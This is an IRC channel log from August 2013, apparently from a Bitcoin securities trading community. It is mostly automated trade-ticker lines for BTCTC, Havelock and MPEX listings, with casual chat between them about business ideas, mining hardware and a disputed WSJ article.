[BTCTC] [ACTIVEMINING] 9 @ 0.005704 = 0.0513 BTC [-] Aug 07 22:23:30 [BTCTC] [ACTIVEMINING] 161 @ 0.0057 = 0.9177 BTC [-] Aug 07 22:24:31 [HAVELOCK] [XBOND] 8 @ 0.00103 = 0.0082 BTC [+] Aug 07 22:25:06 [BTCTC] [ACTIVEMINING] 50 @ 0.00579 = 0.2895 BTC [+] Aug 07 22:25:08 [BTCTC] [ACTIVEMINING] 9 @ 0.005791 = 0.0521 BTC [+] Aug 07 22:25:10 [BTCTC] [DMS.MINING] 5 @ 0.005799 = 0.029 BTC [-] Aug 07 22:25:12 [BTCTC] [DMS.SELLING] 6 @ 0.0226 = 0.1356 BTC [-] Aug 07 22:25:53 [HAVELOCK] [XBOND] 12 @ 0.00103 = 0.0124 BTC [+] Aug 07 22:26:05 [HAVELOCK] [XBOND] 30 @ 0.00103 = 0.0309 BTC [+] Aug 07 22:26:14 [HAVELOCK] [XBOND] 20 @ 0.00103 = 0.0206 BTC [+] Aug 07 22:26:35 [HAVELOCK] [SMG] 10 @ 0.0002387 = 0.0024 BTC [-] Aug 07 22:27:18 [HAVELOCK] [XBOND] 15 @ 0.00103 = 0.0155 BTC [+] Aug 07 22:27:47 [HAVELOCK] [SMG] 10 @ 0.0002387 = 0.0024 BTC [-] Aug 07 22:27:50 [BTCTC] [NASTY-PT] 174 @ 0.004399 = 0.7654 BTC [+] Aug 07 22:27:51 [BTCTC] [NASTY-PT] 200 @ 0.0044 = 0.88 BTC [+] Aug 07 22:27:52 [BTCTC] [NASTY-PT] 50 @ 0.004496 = 0.2248 BTC [+] Aug 07 22:27:53 [BTCTC] [NASTY-PT] 81 @ 0.004498 = 0.3643 BTC [+] Aug 07 22:27:53 [BTCTC] [NASTY-PT] 77 @ 0.0045 = 0.3465 BTC [+] Aug 07 22:27:54 [BTCTC] [NASTY-PT] 40 @ 0.0046 = 0.184 BTC [+] Aug 07 22:29:05 [BTCTC] [LABCOIN] 190 @ 0.0014 = 0.266 BTC [-] Aug 07 22:29:29 [BTCTC] [DMS.MINING] 20 @ 0.0053 = 0.106 BTC [-] Aug 07 22:29:55 [BTCTC] [ACTIVEMINING] 50 @ 0.005791 = 0.2896 BTC [+] Aug 07 22:30:51 [BTCTC] [LABCOIN] 3 @ 0.001413 = 0.0042 BTC [+] Aug 07 22:30:53 [BTCTC] [LABCOIN] 30 @ 0.001414 = 0.0424 BTC [+] Aug 07 22:30:54 [BTCTC] [LABCOIN] 16 @ 0.001424 = 0.0228 BTC [+] Aug 07 22:30:55 [BTCTC] [LABCOIN] 130 @ 0.001425 = 0.1853 BTC [+] Aug 07 22:30:56 [BTCTC] [LABCOIN] 415 @ 0.001431 = 0.5939 BTC [+] Aug 07 22:30:57 [BTCTC] [LABCOIN] 789 @ 0.001432 = 1.1298 BTC [+] Aug 07 22:30:57 [BTCTC] [LABCOIN] 2861 @ 0.001433 = 4.0998 BTC [+] Aug 07 22:30:59 [BTCTC] [LABCOIN] 325 @ 0.001433 = 0.4657 BTC [+] Aug 07 22:31:17 [BTCTC] [LABCOIN] 235 @ 0.001402 = 0.3295 BTC [-] Aug 07 22:31:19 [BTCTC] [LABCOIN] 45 @ 0.0014 = 0.063 BTC [-] Aug 07 22:31:52 okay okay okay Aug 07 22:32:10 how about this: crowdfunded grow-op Aug 07 22:32:12 [BTCTC] [TAT.ASICMINER] 13 @ 0.03782 = 0.4917 BTC [-] Aug 07 22:32:51 beyond old. Aug 07 22:33:03 okay okay okay, how about this Aug 07 22:33:05 this belongs to random dork going all over the us "on bitcoin" Aug 07 22:33:18 as if being a bum is different based on the type of currency you don't have. Aug 07 22:34:14 [HAVELOCK] [AM100] 1 @ 0.03919999 BTC [-] Aug 07 22:34:18 [BTCTC] [ACTIVEMINING] 417 @ 0.005793 = 2.4157 BTC [+] Aug 07 22:34:41 how about: self storage, meets rent a datacenter, meets pot Aug 07 22:34:53 ipo coming tomorrow Aug 07 22:34:55 lol Aug 07 22:36:24 [BTCTC] [ACTIVEMINING] 226 @ 0.005793 = 1.3092 BTC [+] Aug 07 22:36:36 [BTCTC] [LABCOIN] 235 @ 0.001427 = 0.3353 BTC [+] Aug 07 22:36:38 [BTCTC] [LABCOIN] 10 @ 0.00143 = 0.0143 BTC [+] Aug 07 22:36:39 [BTCTC] [LABCOIN] 80 @ 0.001431 = 0.1145 BTC [+] Aug 07 22:36:39 [BTCTC] [LABCOIN] 325 @ 0.001433 = 0.4657 BTC [+] Aug 07 22:36:41 [BTCTC] [LABCOIN] 29 @ 0.001433 = 0.0416 BTC [+] Aug 07 22:37:24 back to the drawing board Aug 07 22:37:25 [BTCTC] [ACTIVEMINING] 2 @ 0.005794 = 0.0116 BTC [+] Aug 07 22:38:54 [BTCTC] [ACTIVEMINING] 29 @ 0.005794 = 0.168 BTC [+] Aug 07 22:40:51 mircea_popescu> as if being a bum is different based on the type of currency you don't have. no, he is still a bum holding a different sign Aug 07 22:41:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.03781 BTC [-] Aug 07 22:43:58 [BTCTC] [LABCOIN] 1 @ 0.00143 BTC [-] Aug 07 22:44:01 [BTCTC] [LABCOIN] 1 @ 0.00143 BTC [-] Aug 07 22:44:02 [BTCTC] [LABCOIN] 20 @ 0.001431 = 0.0286 BTC [+] Aug 07 22:44:03 [BTCTC] [LABCOIN] 108 @ 0.001433 = 0.1548 BTC [+] Aug 07 22:44:05 [BTCTC] [LABCOIN] 40 @ 0.001433 = 0.0573 BTC [+] Aug 07 22:44:06 [BTCTC] [LABCOIN] 526 @ 0.001434 = 0.7543 BTC [+] Aug 07 22:44:11 all, pls vote yes on the poll to have Smidge.Com A listed on bitfunder: https://bitcointalk.org/index.php?topic=269455 Aug 07 22:44:12 kthx Aug 07 22:44:25 Lol kk Aug 07 22:44:28 (except mircea) Aug 07 22:44:30 :) Aug 07 22:45:08 [BTCTC] [LABCOIN] 86 @ 0.001433 = 0.1232 BTC [-] Aug 07 22:45:12 smidge tell me about your scam Aug 07 22:45:34 i wont Aug 07 22:45:37 its hidden in the business plan though Aug 07 22:45:44 oic Aug 07 22:45:45 i learned how to say mircea's name Aug 07 22:45:50 [BTCTC] [LABCOIN] 1974 @ 0.001434 = 2.8307 BTC [+] Aug 07 22:48:00 [HAVELOCK] [SDSTM] 5 @ 0.0063 = 0.0315 BTC [-] Aug 07 22:48:29 [HAVELOCK] [XBOND] 3 @ 0.00103 = 0.0031 BTC [+] Aug 07 22:49:20 [BTCTC] [LABCOIN] 4 @ 0.001434 = 0.0057 BTC [+] Aug 07 22:49:21 [BTCTC] [LABCOIN] 100 @ 0.001435 = 0.1435 BTC [+] Aug 07 22:49:23 [BTCTC] [LABCOIN] 10 @ 0.001443 = 0.0144 BTC [+] Aug 07 22:49:24 [BTCTC] [LABCOIN] 236 @ 0.001444 = 0.3408 BTC [+] Aug 07 22:49:58 [BTCTC] [LABCOIN] 2 @ 0.001444 = 0.0029 BTC [+] Aug 07 22:50:16 [BTCTC] [BTCGARDEN] 26 @ 0.01599 = 0.4157 BTC [-] Aug 07 22:50:56 [HAVELOCK] [XBOND] 100 @ 0.00103 = 0.103 BTC [+] Aug 07 22:51:27 [BTCTC] [LABCOIN] 12 @ 0.001444 = 0.0173 BTC [+] Aug 07 22:52:28 [BTCTC] [LABCOIN] 6 @ 0.001458 = 0.0087 BTC [+] Aug 07 22:52:29 [BTCTC] [LABCOIN] 4 @ 0.001459 = 0.0058 BTC [+] Aug 07 22:53:27 [BTCTC] [TAT.ASICMINER] 32 @ 0.03779 = 1.2093 BTC [-] Aug 07 22:53:52 [BTCTC] [LABCOIN] 96 @ 0.001459 = 0.1401 BTC [+] Aug 07 22:53:54 [BTCTC] [LABCOIN] 12 @ 0.001484 = 0.0178 BTC [+] Aug 07 22:53:54 ThickAsThieves, do tell Aug 07 22:53:55 [BTCTC] [LABCOIN] 100 @ 0.001485 = 0.1485 BTC [+] Aug 07 22:53:56 [BTCTC] [LABCOIN] 17 @ 0.001486 = 0.0253 BTC [+] Aug 07 22:53:57 [BTCTC] [LABCOIN] 110 @ 0.001487 = 0.1636 BTC [+] Aug 07 22:53:58 [BTCTC] [LABCOIN] 392 @ 0.001488 = 0.5833 BTC [+] Aug 07 22:53:59 [BTCTC] [LABCOIN] 1273 @ 0.001489 = 1.8955 BTC [+] Aug 07 22:54:09 i was thinking about that on the train this moring Aug 07 22:54:17 wierd as that sounds...lol Aug 07 22:54:24 [BTCTC] [ACTIVEMINING] 232 @ 0.005794 = 1.3442 BTC [+] Aug 07 22:54:25 [BTCTC] [ACTIVEMINING] 161 @ 0.005795 = 0.933 BTC [+] Aug 07 22:55:20 [BTCTC] [BFMINES] 100 @ 0.003982 = 0.3982 BTC [+] Aug 07 22:56:00 [BTCTC] [BTCGARDEN] 120 @ 0.016 = 1.92 BTC [+] Aug 07 22:56:01 [BTCTC] [S.MPOE-PT] 2 @ 0.0009985 = 0.002 BTC [+] Aug 07 22:56:42 [BTCTC] [LABCOIN] 120 @ 0.001477 = 0.1772 BTC [-] Aug 07 22:56:42 no way Aug 07 22:56:43 [BTCTC] [LABCOIN] 233 @ 0.001488 = 0.3467 BTC [+] Aug 07 22:56:44 [BTCTC] [LABCOIN] 10 @ 0.001488 = 0.0149 BTC [+] Aug 07 22:56:45 [BTCTC] [LABCOIN] 637 @ 0.001489 = 0.9485 BTC [+] Aug 07 22:56:45 i won't tell Aug 07 22:56:54 it's like saying candyman Aug 07 22:56:58 or rumplestiltskin Aug 07 22:57:02 [HAVELOCK] [AM100] 2 @ 0.03919999 = 0.0784 BTC [-] Aug 07 22:57:11 [BTCTC] [S.MPOE-PT] 33 @ 0.0009986 = 0.033 BTC [+] Aug 07 22:58:25 Beetlejuice? Aug 07 22:58:30 Beetlejuice? Aug 07 22:58:36 .. Aug 07 22:59:09 [HAVELOCK] [AM100] 30 @ 0.03919999 = 1.176 BTC [-] Aug 07 22:59:19 [HAVELOCK] [LABCO] 10 @ 0.00151 = 0.0151 BTC [-] Aug 07 22:59:27 [HAVELOCK] [LABCO] 15 @ 0.0015 = 0.0225 BTC [-] Aug 07 23:00:17 [HAVELOCK] [SDSTM] 40 @ 0.0063 = 0.252 BTC [-] Aug 07 23:00:34 [HAVELOCK] [LABCO] 10 @ 0.00141 = 0.0141 BTC [-] Aug 07 23:00:45 [HAVELOCK] [LABCO] 23 @ 0.0014 = 0.0322 BTC [-] Aug 07 23:01:04 you get the idea Aug 07 23:02:30 [HAVELOCK] [LABCO] 8 @ 0.00176 = 0.0141 BTC [+] Aug 07 23:03:04 [HAVELOCK] [XBOND] 8 @ 0.00101704 = 0.0081 BTC [-] Aug 07 23:03:06 [HAVELOCK] [XBOND] 2 @ 0.00101704 = 0.002 BTC [-] Aug 07 23:03:14 [HAVELOCK] [SMG] 2 @ 0.0002387 = 0.0005 BTC [-] Aug 07 23:03:27 [HAVELOCK] [LABCO] 4 @ 0.00176 = 0.007 BTC [+] Aug 07 23:04:33 [HAVELOCK] [XBOND] 1 @ 0.00103 BTC [+] Aug 07 23:08:01 [BTCTC] [ASICMINER-PT] 1 @ 3.862 BTC [-] Aug 07 23:08:16 [BTCTC] [LABCOIN] 50 @ 0.00144 = 0.072 BTC [-] Aug 07 23:08:17 [BTCTC] [LABCOIN] 235 @ 0.001439 = 0.3382 BTC [-] Aug 07 23:08:25 [BTCTC] [ASICMINER-PT] 1 @ 3.86 BTC [-] Aug 07 23:08:51 [BTCTC] [ASICMINER-PT] 4 @ 3.824 = 15.296 BTC [-] Aug 07 23:09:10 [BTCTC] [ASICMINER-PT] 8 @ 3.823 = 30.584 BTC [-] Aug 07 23:09:31 [BTCTC] [ASICMINER-PT] 1 @ 3.784 BTC [-] Aug 07 23:10:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.03721 = 0.1116 BTC [-] Aug 07 23:11:51 [BTCTC] [LABCOIN] 50 @ 0.001387 = 0.0694 BTC [-] Aug 07 23:12:15 [BTCTC] [LABCOIN] 107 @ 0.001387 = 0.1484 BTC [-] Aug 07 23:12:47 [BTCTC] [TAT.ASICMINER] 8 @ 0.03701 = 0.2961 BTC [-] Aug 07 23:12:49 [BTCTC] [ASICMINER-PT] 1 @ 3.785 BTC [+] Aug 07 23:13:07 [BTCTC] [ASICMINER-PT] 1 @ 3.784 BTC [-] Aug 07 23:13:33 [BTCTC] [ASICMINER-PT] 1 @ 3.783 BTC [-] Aug 07 23:14:21 [BTCTC] [LABCOIN] 50 @ 0.001404 = 0.0702 BTC [+] Aug 07 23:14:34 [BTCTC] [DMS.MINING] 10 @ 0.005213 = 0.0521 BTC [-] Aug 07 23:14:35 [BTCTC] [DMS.MINING] 43 @ 0.005211 = 0.2241 BTC [-] Aug 07 23:14:57 [BTCTC] [DMS.MINING] 89 @ 0.00521 = 0.4637 BTC [-] Aug 07 23:15:15 [BTCTC] [ASICMINER-PT] 1 @ 3.78 BTC [-] Aug 07 23:15:35 [BTCTC] [ASICMINER-PT] 2 @ 3.771 = 7.542 BTC [-] Aug 07 23:16:02 [BTCTC] [ASICMINER-PT] 5 @ 3.8 = 19 BTC [+] Aug 07 23:16:04 [BTCTC] [ASICMINER-PT] 1 @ 3.77 BTC [-] Aug 07 23:16:04 [BTCTC] [ASICMINER-PT] 3 @ 3.77 = 11.31 BTC [-] Aug 07 23:16:15 [BTCTC] [TAT.ASICMINER] 19 @ 0.03773 = 0.7169 BTC [+] Aug 07 23:16:58 [BTCTC] [LABCOIN] 50 @ 0.001431 = 0.0716 BTC [+] Aug 07 23:16:59 [BTCTC] [LABCOIN] 235 @ 0.001432 = 0.3365 BTC [+] Aug 07 23:17:01 [BTCTC] [LABCOIN] 2 @ 0.001432 = 0.0029 BTC [+] Aug 07 23:17:02 [BTCTC] [LABCOIN] 7 @ 0.001434 = 0.01 BTC [+] Aug 07 23:17:03 [BTCTC] [LABCOIN] 115 @ 0.001435 = 0.165 BTC [+] Aug 07 23:17:04 [BTCTC] [LABCOIN] 6 @ 0.001469 = 0.0088 BTC [+] Aug 07 23:17:05 [BTCTC] [LABCOIN] 50 @ 0.00147 = 0.0735 BTC [+] Aug 07 23:17:06 [BTCTC] [LABCOIN] 12 @ 0.001482 = 0.0178 BTC [+] Aug 07 23:17:07 [BTCTC] [LABCOIN] 100 @ 0.001483 = 0.1483 BTC [+] Aug 07 23:17:07 [BTCTC] [LABCOIN] 12 @ 0.001484 = 0.0178 BTC [+] Aug 07 23:17:09 [BTCTC] [LABCOIN] 100 @ 0.001485 = 0.1485 BTC [+] Aug 07 23:17:10 [BTCTC] [LABCOIN] 153 @ 0.001488 = 0.2277 BTC [+] Aug 07 23:17:11 [BTCTC] [LABCOIN] 90 @ 0.001489 = 0.134 BTC [+] Aug 07 23:17:12 [BTCTC] [LABCOIN] 68 @ 0.00149 = 0.1013 BTC [+] Aug 07 23:17:32 [BTCTC] [BTC-BOND] 10 @ 0.00999 = 0.0999 BTC [-] Aug 07 23:19:07 [HAVELOCK] [AM100] 1 @ 0.03919997 BTC [-] Aug 07 23:19:40 Coinado has a running board with BFL sample chips Aug 07 23:20:02 any fans ? Aug 07 23:20:40 [BTCTC] [TAT.ASICMINER] 24 @ 0.03773 = 0.9055 BTC [+] Aug 07 23:21:10 no, just a big heatsink on top for now it looks like Aug 07 23:22:20 just saw another pic, yes - one big one on top Aug 07 23:24:10 [BTCTC] [TAT.ASICMINER] 3 @ 0.03773 = 0.1132 BTC [+] Aug 07 23:24:55 [BTCTC] [TAT.ASICMINER] 52 @ 0.03705 = 1.9266 BTC [-] Aug 07 23:30:52 [HAVELOCK] [XBOND] 435 @ 0.00103 = 0.4481 BTC [+] Aug 07 23:31:27 [HAVELOCK] [XBOND] 1 @ 0.00103 BTC [+] Aug 07 23:32:07 [BTCTC] [LABCOIN] 50 @ 0.001411 = 0.0706 BTC [-] Aug 07 23:32:10 [BTCTC] [LABCOIN] 235 @ 0.00141 = 0.3314 BTC [-] Aug 07 23:32:11 [BTCTC] [LABCOIN] 6 @ 0.001406 = 0.0084 BTC [-] Aug 07 23:32:13 [BTCTC] [LABCOIN] 3 @ 0.001404 = 0.0042 BTC [-] Aug 07 23:32:14 [BTCTC] [LABCOIN] 180 @ 0.001384 = 0.2491 BTC [-] Aug 07 23:32:15 [BTCTC] [LABCOIN] 1443 @ 0.001383 = 1.9957 BTC [-] Aug 07 23:32:16 [BTCTC] [LABCOIN] 1 @ 0.001381 BTC [-] Aug 07 23:32:18 [BTCTC] [LABCOIN] 10 @ 0.00138 = 0.0138 BTC [-] Aug 07 23:32:19 [BTCTC] [LABCOIN] 6 @ 0.001374 = 0.0082 BTC [-] Aug 07 23:32:20 [BTCTC] [LABCOIN] 50 @ 0.001373 = 0.0687 BTC [-] Aug 07 23:32:21 [BTCTC] [LABCOIN] 1250 @ 0.001371 = 1.7138 BTC [-] Aug 07 23:32:21 [BTCTC] [LABCOIN] 5766 @ 0.00137 = 7.8994 BTC [-] Aug 07 23:33:10 what was up with that wsj article on joe lewis? Aug 07 23:33:43 lies Aug 07 23:34:05 as far as i can tell, wsj took the story from bitcoinexaminer who took the story from a 2 year old mistaken article about avalon Aug 07 23:34:30 but how does that shit even get published at wsj? Aug 07 23:35:21 [BTCTC] [NASTY-PT] 250 @ 0.0045 = 1.125 BTC [-] Aug 07 23:39:18 [BTCTC] [TAT.ASICMINER] 6 @ 0.03768 = 0.2261 BTC [+] Aug 07 23:40:08 Yeah, that article did not even pass the stupid test Aug 07 23:42:04 [BTCTC] [NASTY-PT] 10 @ 0.0045 = 0.045 BTC [-] Aug 07 23:42:13 $200 million invested in Avalon, after they broke up. All mining revenue is approx $11 million a month- fractured into a million parts. So even if they mined 20% of the network that is 100 months Aug 07 23:42:37 that is if they owned 100% of Avalon and had no expenses Aug 07 23:44:02 [BTCTC] [NASTY-PT] 2 @ 0.0045 = 0.009 BTC [-] Aug 07 23:46:16 [BTCTC] [ASICMINER-PT] 1 @ 3.869 BTC [+] Aug 07 23:46:17 [BTCTC] [ASICMINER-PT] 1 @ 3.87 BTC [+] Aug 07 23:46:38 [HAVELOCK] [AM100] 4 @ 0.03810002 = 0.1524 BTC [-] Aug 07 23:47:47 [HAVELOCK] [XBOND] 1 @ 0.00101705 BTC [-] Aug 07 23:48:04 [BTCTC] [NASTY-PT] 238 @ 0.0045 = 1.071 BTC [-] Aug 07 23:48:12 [HAVELOCK] [XBOND] 14 @ 0.00101704 = 0.0142 BTC [-] Aug 07 23:48:58 [HAVELOCK] [XBOND] 6 @ 0.00101704 = 0.0061 BTC [-] Aug 07 23:50:05 [BTCTC] [LABCOIN] 16 @ 0.001412 = 0.0226 BTC [+] Aug 07 23:50:11 [HAVELOCK] [LABCO] 8 @ 0.00188 = 0.015 BTC [+] Aug 07 23:50:33 [BTCTC] [LABCOIN] 1 @ 0.00141 BTC [-] Aug 07 23:51:12 [MPEX] [S.MPOE] 2750 @ 0.00083258 = 2.2896 BTC [-] Aug 07 23:51:57 [HAVELOCK] [AM100] 1 @ 0.03811 BTC [+] Aug 07 23:52:12 [HAVELOCK] [AM100] 1 @ 0.03810001 BTC [-] Aug 07 23:52:31 [BTCTC] [LABCOIN] 1 @ 0.001408 BTC [-] Aug 07 23:53:48 [BTCTC] [BITVPS] 5 @ 0.00194 = 0.0097 BTC [+] Aug 07 23:57:04 [HAVELOCK] [XBOND] 3 @ 0.00103 = 0.0031 BTC [+] Aug 07 23:58:17 [HAVELOCK] [XBOND] 1 @ 0.00103 BTC [+] Aug 07 23:59:05 [HAVELOCK] [XBOND] 1000 @ 0.00103 = 1.03 BTC [+] Aug 08 00:00:20 [HAVELOCK] [AM100] 3 @ 0.0381 = 0.1143 BTC [-] Aug 08 00:00:28 [HAVELOCK] [AM100] 5 @ 0.0375 = 0.1875 BTC [-] Aug 08 00:00:35 [HAVELOCK] [AM100] 10 @ 0.0374 = 0.374 BTC [-] Aug 08 00:00:40 [HAVELOCK] [AM100] 5 @ 0.03730002 = 0.1865 BTC [-] Aug 08 00:00:44 [HAVELOCK] [AM100] 1 @ 0.0373 BTC [-] Aug 08 00:00:49 [HAVELOCK] [AM100] 6 @ 0.03720001 = 0.2232 BTC [-] Aug 08 00:00:53 [HAVELOCK] [AM100] 1 @ 0.0372 BTC [-] Aug 08 00:01:03 [HAVELOCK] [AM100] 9 @ 0.0372 = 0.3348 BTC [-] Aug 08 00:01:15 [HAVELOCK] [AM100] 1 @ 0.0372 BTC [-] Aug 08 00:04:34 [BTCTC] [LABCOIN] 50 @ 0.001407 = 0.0704 BTC [-] Aug 08 00:04:36 [BTCTC] [LABCOIN] 1 @ 0.001406 BTC [-] Aug 08 00:04:37 [BTCTC] [LABCOIN] 4 @ 0.0014 = 0.0056 BTC [-] Aug 08 00:04:39 [BTCTC] [LABCOIN] 7 @ 0.001382 = 0.0097 BTC [-] Aug 08 00:04:41 [BTCTC] [LABCOIN] 60 @ 0.001381 = 0.0829 BTC [-] Aug 08 00:04:43 [BTCTC] [LABCOIN] 6 @ 0.001372 = 0.0082 BTC [-] Aug 08 00:04:45 [BTCTC] [LABCOIN] 529 @ 0.001371 = 0.7253 BTC [-] Aug 08 00:04:47 [HAVELOCK] [AM1] 1 @ 3.89989999 BTC [-] Aug 08 00:04:50 [BTCTC] [LABCOIN] 1103 @ 0.00137 = 1.5111 BTC [-] Aug 08 00:06:13 [HAVELOCK] [HIM] 1 @ 0.143 BTC [+] Aug 08 00:06:27 [BTCTC] [LABCOIN] 50 @ 0.001406 = 0.0703 BTC [+] Aug 08 00:06:29 [BTCTC] [LABCOIN] 150 @ 0.001405 = 0.2108 BTC [-] Aug 08 00:06:30 [HAVELOCK] [HIM] 1 @ 0.14399999 BTC [+] Aug 08 00:06:49 [BTCTC] [LABCOIN] 4 @ 0.001448 = 0.0058 BTC [+] Aug 08 00:06:55 [BTCTC] [KENILWORTH] 1 @ 0.001799 BTC [+] Aug 08 00:07:33 [BTCTC] [DMS.MINING] 10 @ 0.0054 = 0.054 BTC [+] Aug 08 00:07:42 [BTCTC] [ACTIVEMINING] 200 @ 0.005798 = 1.1596 BTC [+] Aug 08 00:08:03 http://www.aljazeera.com/video/europe/2013/08/20138716169972543.html Aug 08 00:08:06 Barclays urged to revert remittance block - Europe - Al Jazeera English Aug 08 00:08:09 somali pirates need bitcoin Aug 08 00:08:28 [BTCTC] [ACTIVEMINING] 10 @ 0.005799 = 0.058 BTC [+] Aug 08 00:10:26 [BTCTC] [ACTIVEMINING] 2 @ 0.005798 = 0.0116 BTC [-] Aug 08 00:10:51 [BTCTC] [BTCGARDEN] 28 @ 0.01575 = 0.441 BTC [-] Aug 08 00:10:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.0376 BTC [-] Aug 08 00:11:46 ;;estimate Aug 08 00:11:47 Next difficulty estimate | None based on data since last change | 49000995.0699 based on data for last three days Aug 08 00:12:57 http://m.theatlantic.com/infocus/2013/08/26-years-of-growth-shanghai-then-and-now/100569/ Aug 08 00:13:00 26 Years of Growth: Shanghai Then and Now - In Focus - The Atlantic Aug 08 00:13:11 and in another 26 years all tose buildings have fallen over Aug 08 00:14:01 [BTCTC] [ACTIVEMINING] 4 @ 0.005798 = 0.0232 BTC [-] Aug 08 00:14:24 [BTCTC] [NASTY-PT] 1 @ 0.00564 BTC [+] Aug 08 00:14:57 [BTCTC] [ACTIVEMINING] 75 @ 0.005799 = 0.4349 BTC [+] Aug 08 00:15:11 [BTCTC] [ACTIVEMINING] 100 @ 0.005799 = 0.5799 BTC [+] Aug 08 00:15:22 [BTCTC] [ACTIVEMINING] 308 @ 0.005799 = 1.7861 BTC [+] Aug 08 00:15:32 [BTCTC] [NASTY-PT] 2 @ 0.00564 = 0.0113 BTC [+] Aug 08 00:15:34 [BTCTC] [NASTY-PT] 10 @ 0.00564 = 0.0564 BTC [+] Aug 08 00:15:35 [BTCTC] [NASTY-PT] 50 @ 0.00565 = 0.2825 BTC [+] Aug 08 00:15:36 [BTCTC] [NASTY-PT] 100 @ 0.005749 = 0.5749 BTC [+] Aug 08 00:15:37 [BTCTC] [NASTY-PT] 38 @ 0.00575 = 0.2185 BTC [+] Aug 08 00:15:45 [BTCTC] [LABCOIN] 20 @ 0.001423 = 0.0285 BTC [-] Aug 08 00:16:16 [BTCTC] [NASTY-PT] 12 @ 0.005255 = 0.0631 BTC [-] Aug 08 00:16:18 [BTCTC] [NASTY-PT] 11 @ 0.005159 = 0.0567 BTC [-] Aug 08 00:17:08 [BTCTC] [NASTY-PT] 100 @ 0.0045 = 0.45 BTC [-] Aug 08 00:17:48 [HAVELOCK] [XBOND] 18 @ 0.00103 = 0.0185 BTC [+] Aug 08 00:19:35 [BTCTC] [NASTY-PT] 10 @ 0.0045 = 0.045 BTC [-] Aug 08 00:21:06 [BTCTC] [RSM] 1 @ 0.011 BTC [-] Aug 08 00:21:17 [BTCTC] [DMS.MINING] 15 @ 0.005222 = 0.0783 BTC [-] Aug 08 00:22:30 [BTCTC] [BASIC-MINING] 2 @ 0.34 = 0.68 BTC [+] Aug 08 00:23:23 [HAVELOCK] [AM100] 1 @ 0.03889999 BTC [+] Aug 08 00:24:11 [BTCTC] [ACTIVEMINING] 357 @ 0.005793 = 2.0681 BTC [-] Aug 08 00:24:12 [BTCTC] [ACTIVEMINING] 63 @ 0.005791 = 0.3648 BTC [-] Aug 08 00:24:23 [HAVELOCK] [AM100] 1 @ 0.0389 BTC [+] Aug 08 00:24:26 [HAVELOCK] [AM100] 4 @ 0.03899997 = 0.156 BTC [+] Aug 08 00:25:12 [HAVELOCK] [AM100] 3 @ 0.03899996 = 0.117 BTC [-] Aug 08 00:29:34 [BTCTC] [NASTY-PT] 150 @ 0.0045 = 0.675 BTC [-] Aug 08 00:31:47 [BTCTC] [ACTIVEMINING] 50 @ 0.005706 = 0.2853 BTC [-] Aug 08 00:32:34 [BTCTC] [ASICMINER-PT] 1 @ 3.911 BTC [+] Aug 08 00:37:56 [BTCTC] [ACTIVEMINING] 50 @ 0.005713 = 0.2857 BTC [+] Aug 08 00:37:58 [BTCTC] [ACTIVEMINING] 68 @ 0.005712 = 0.3884 BTC [-] Aug 08 00:37:59 [BTCTC] [ACTIVEMINING] 367 @ 0.0057 = 2.0919 BTC [-] Aug 08 00:42:50 [BTCTC] [LABCOIN] 213 @ 0.001402 = 0.2986 BTC [-] Aug 08 00:42:52 [BTCTC] [LABCOIN] 50 @ 0.001401 = 0.0701 BTC [-] Aug 08 00:42:53 [BTCTC] [LABCOIN] 3787 @ 0.0014 = 5.3018 BTC [-] Aug 08 00:43:19 [MPEX] [S.MPOE] 6628 @ 0.00083258 = 5.5183 BTC [-] Aug 08 00:43:21 [MPEX] [S.MPOE] 11100 @ 0.00083323 = 9.2489 BTC [+] Aug 08 00:43:23 [MPEX] [S.MPOE] 8278 @ 0.00083341 = 6.899 BTC [+] Aug 08 00:44:03 [BTCTC] [LABCOIN] 50 @ 0.001401 = 0.0701 BTC [+] Aug 08 00:44:05 [BTCTC] [LABCOIN] 213 @ 0.0014 = 0.2982 BTC [-] Aug 08 00:49:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.0371 = 0.371 BTC [-] Aug 08 00:49:54 [HAVELOCK] [AM100] 10 @ 0.0389 = 0.389 BTC [-] Aug 08 00:49:57 [HAVELOCK] [AM100] 34 @ 0.0389 = 1.3226 BTC [-] Aug 08 00:55:26 [BTCTC] [ASICMINER-PT] 1 @ 3.915 BTC [+] Aug 08 00:55:44 [BTCTC] [ASICMINER-PT] 1 @ 3.916 BTC [+] Aug 08 00:56:23 [BTCTC] [ASICMINER-PT] 1 @ 3.92 BTC [+] Aug 08 00:56:56 [BTCTC] [ASICMINER-PT] 1 @ 3.921 BTC [+] Aug 08 00:58:08 [BTCTC] [DMS.MINING] 76 @ 0.005527 = 0.4201 BTC [+] Aug 08 00:58:09 [BTCTC] [DMS.MINING] 10 @ 0.005228 = 0.0523 BTC [-] Aug 08 00:58:11 [BTCTC] [DMS.MINING] 70 @ 0.005227 = 0.3659 BTC [-] Aug 08 00:58:12 [BTCTC] [DMS.MINING] 1 @ 0.005226 BTC [-] Aug 08 00:58:13 [BTCTC] [DMS.MINING] 5 @ 0.005223 = 0.0261 BTC [-] Aug 08 00:58:13 [BTCTC] [DMS.MINING] 20 @ 0.005223 = 0.1045 BTC [-] Aug 08 00:58:15 [BTCTC] [DMS.MINING] 11 @ 0.00521 = 0.0573 BTC [-] Aug 08 00:58:16 [BTCTC] [DMS.MINING] 217 @ 0.005201 = 1.1286 BTC [-] Aug 08 00:59:45 [BTCTC] [CRYPTO-TRADE] 4 @ 0.1999 = 0.7996 BTC [+] Aug 08 00:59:56 [BTCTC] [LABCOIN] 4 @ 0.001407 = 0.0056 BTC [+] Aug 08 01:01:26 [BTCTC] [LABCOIN] 50 @ 0.001407 = 0.0704 BTC [+] Aug 08 01:01:41 [BTCTC] [LABCOIN] 50 @ 0.001407 = 0.0704 BTC [+] Aug 08 01:02:22 anyone else having trouble logging into btct.co? Aug 08 01:02:25 [BTCTC] [LABCOIN] 3 @ 0.00141 = 0.0042 BTC [+] Aug 08 01:02:36 [BTCTC] [LABCOIN] 50 @ 0.001409 = 0.0705 BTC [-] Aug 08 01:02:37 [BTCTC] [LABCOIN] 185 @ 0.001408 = 0.2605 BTC [-] Aug 08 01:03:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.03778 BTC [+] Aug 08 01:03:32 [BTCTC] [LABCOIN] 50 @ 0.001409 = 0.0705 BTC [+] Aug 08 01:03:34 [BTCTC] [LABCOIN] 50 @ 0.001408 = 0.0704 BTC [-] Aug 08 01:06:40 [BTCTC] [BITVPS] 250 @ 0.001919 = 0.4798 BTC [-] Aug 08 01:08:08 